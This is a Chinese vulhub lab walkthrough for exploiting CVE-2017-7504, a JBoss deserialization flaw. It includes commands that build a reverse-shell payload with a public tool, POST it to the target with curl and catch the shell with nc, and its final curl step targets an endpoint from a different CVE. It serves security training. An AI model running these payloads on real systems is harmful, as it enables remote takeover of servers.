vulhub之jboss(CVE-2017-7504)

复制代码
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的 HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径不一样, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。

JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java ⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。

环境准备

问题:

端口占用

如果默认的8080端口被占用,可以改为:docker run -p 8080:8081 <image_name>

或者修改docker-compose 端口号

漏洞发现

访问your-ip:8080/jbossmq-httpil/HTTPServerILServlet

如出现以下界面,说明存在此漏洞

漏洞利用

进入攻击机,下载反序列化工具

下载地址:GitHub - ianxtianxt/CVE-2015-7501: (CVE-2015-7501)JBoss JMXInvokerServlet 反序列化漏洞

进入目录执行

1、javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2、java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:监听端口

再用之前生成的.ser文件,通过POST二进制数据上去,使用nc监听端口,即可拿到shell

curl http://目标ip:port/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

相关推荐
楼田莉子3 分钟前
Linux网络:IP协议
linux·服务器·网络·c++·学习·tcp/ip
wuminyu7 分钟前
专家视角看JVM_StartThread
java·linux·c语言·jvm·c++
敲上瘾11 分钟前
高并发内存池(三):PageCache(页缓存)的实现
linux·c++·缓存·高并发内存池·池化技术
Ops菜鸟(Xu JieHao)21 分钟前
Linux 内网远程桌面Xrdp ~保姆级教程
linux·运维·服务器·windows·远程桌面·远程·xrdp
zjeweler22 分钟前
linux服务器部署openclaw最新最细教程(非docker版)
linux·服务器·docker·openclaw
ll_af22 分钟前
内网渗透完整链路:从外网打点到域控权限
网络·安全·web安全
熊猫不是猫QAQ24 分钟前
冒险岛怀旧服开启预约!公测之前用NAS怀旧一下吧
经验分享
xixixi7777725 分钟前
跨境AI服务:多语种大模型+卫星通信+量子加密+数据脱敏+安全审计,合规·高效·安全三重保障
人工智能·安全·大模型·通信·卫星通信·审计·量子安全
minglie125 分钟前
zynq裸机和linux spidev操作W25Q16
linux
张璐月27 分钟前
[ecapture] gotls:三种模式实现说明与上层应用职责
网络·ebpf·gotls·ecapture